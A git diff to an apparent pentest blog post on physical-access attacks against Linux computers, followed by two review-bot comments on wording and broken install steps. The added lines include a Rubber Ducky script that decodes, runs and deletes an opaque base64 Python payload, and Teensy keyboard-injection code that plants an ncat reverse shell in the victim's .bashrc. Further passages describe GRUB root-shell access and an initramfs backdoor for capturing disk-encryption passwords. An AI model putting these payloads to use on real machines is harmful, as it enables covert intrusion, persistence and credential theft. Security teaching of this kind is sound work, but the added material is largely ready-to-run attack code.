diff --git a/_posts/2017-11-8-FrenchCroissant.md b/_posts/2017-11-8-FrenchCroissant.md index d5c543e..da480cc 100644 --- a/_posts/2017-11-8-FrenchCroissant.md +++ b/_posts/2017-11-8-FrenchCroissant.md @@ -38,7 +38,7 @@ Most of the times you can acces the debug application on the port 80 on the inte ## USB Live ISO When there is no bios password, it's easy to compromise the computer by booting with a Live USB / Live CD and adding the backdoor. -## Grub - root access +## Grub - Root access Even if there is a bios password you still need to secure your Grub (boot-manager), otherwise anyone can edit it in order to start a root shell. {% highlight bash%} 
@@ -47,8 +47,80 @@ Press [E] to edit the command line Append init=/bin/sh {% endhighlight %} +## USB : Rubber Ducky or Teensy +If you are willing to spend around 40$, you can buy a Rubber Ducky. This is a fake USB which will act as a keyboard and send any key to the plugged computer. The payload can be created within a notepad or online at https://ducktoolkit.com/. + +The full documentation is available at [https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript) + +The following script was generated by DuckToolkit and serve a directory via HTTP +{% highlight bash%} +DEFAULT_DELAY 100 +DELAY 3000 +CTRL-ALT t +DELAY 200 +STRING printf '\e[3;1;1t' +ENTER +STRING echo H4sIACBLCFoC/13OzwqDMAwG8HufIiDM9jAfYLD7joLei2hmC/1HGgXffh2dHpbTx0f4JdanSAwxC1tTPq7oN8c2UZwxZxtWIRZ8Qzq0YU5SPQSUibmbzWJJtq06i0Iwetmmg00McPcwFNHhaxz7AWlHAriVddEUUBskrDRtQU/OnfTf+a6vUfJEK/Lz94jqcilY1uvN16jipX0AB59ZiuMAAAA= | base64 --decode | gzip -d > environ-34314.py +ENTER +STRING nohup python environ-34314.py > /dev/null 2>&1 & +ENTER +STRING rm -rf environ-34314.py +ENTER +STRING exit +ENTER +{% endhighlight %} + + +Alternatively you can buy a Teensy board for 15$, it requires a little bit of configuration but it works as well +First, you need to install the arduino IDE, the Teensyduino and the rules for the Teensy board. 
+{% highlight bash%} +wget https://raw.githubusercontent.com/apmorton/teensy-template/master/tools/49-teensy.rules +mv 49-teensy.rules /etc/udev/rules.d/49-teensy.rules +wget https://www.pjrc.com/teensy/td_140/TeensyduinoInstall.linux64 && chmod +x ./TeensyduinoInstall.linux64 &&./TeensyduinoInstall.linux64 +wget https://www.arduino.cc/download_handler.php +tar xvf arduino-1.8.5-linux64.tar.xz +{% endhighlight %} + +The following code press the keys [ALT]+[F2], then write "xterm", followed by an echo into the user's .bashrc +{% highlight c%} +void setup() { + + delay(100); + Keyboard.set_modifier(MODIFIERKEY_ALT); + Keyboard.set_key1(KEY_F2); + Keyboard.send_now(); + delay(100); + + Keyboard.set_modifier(0); + Keyboard.set_key1(0); + Keyboard.send_now(); + delay(100); + + Keyboard.println("xterm"); + delay(100); + + Keyboard.set_key1(KEY_ENTER); + Keyboard.send_now(); + delay(100); + + // Reverse-shell stored in the bashrc + Keyboard.println(" echo ' ncat 192.168.1.XX 4242 -e /bin/bash 2>/dev/null & clear' >> $HOME/.bashrc "); + delay(100); + + // Now we clean our tracks + Keyboard.println("exit"); + delay(100); +} + +void loop() { + delay(5000); +} +{% endhighlight %} +NOTE: When programming the board press the "RESET" button to avoid the launch of the payload on your computer + +## Initramfs Backdoor - Encrypted Hard Drive +When you're booting there is one partition that is not encrypted in order to start. It will ask for your password and then decrypt and mount the other partition. If you have and access to the hard drive it is possible to replace the Initramfs.img in order to get the password to decrypt the full hdd, you can also wait for the decryption and then inject what you want inside a file as root :) -## Encrypted Hard Drive Mounting boot partition (not encrypted) {% highlight bash%} fdisk -l /dev/sda
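Review bot: the Grub section touched by the first hunk tells the reader "you still need to secure your Grub" but only shows how to edit the boot entry, never how to prevent it. Since the heading is being edited anyway, suggest adding one sentence on the fix, for example setting a GRUB superuser with a `password_pbkdf2` hash so that pressing [E] prompts for credentials. The capitalisation change itself is fine, though "GRUB" and "BIOS" are normally written in capitals and the context line still has "acces" for "access".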
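Review bot: the Teensy install commands in the second hunk will not run as written. `wget https://www.arduino.cc/download_handler.php` has no file parameter and no `-O`, so whatever it returns is saved as download_handler.php and the next line, `tar xvf arduino-1.8.5-linux64.tar.xz`, has no archive to extract; `mv 49-teensy.rules /etc/udev/rules.d/49-teensy.rules` also needs root. Suggest pointing at the exact archive (or telling readers to fetch it from the Arduino download page), prefixing the `mv` with sudo, and splitting the `wget ... && chmod +x ... && ./TeensyduinoInstall.linux64` chain so the installer can be checked against a published checksum before it is executed. Smaller points in the same hunk: "serve a directory" should be "serves", "The following code press" should be "presses", and "If you have and access" should be "If you have access"; the comment "Now we clean our tracks" sits above a line that only types `exit`, so it overstates what the sketch does; the base64 blob in the DuckToolkit script is opaque, and one sentence stating what environ-34314.py contains would let readers audit it; and the new heading replaces `## Encrypted Hard Drive`, so any existing links to that anchor will break.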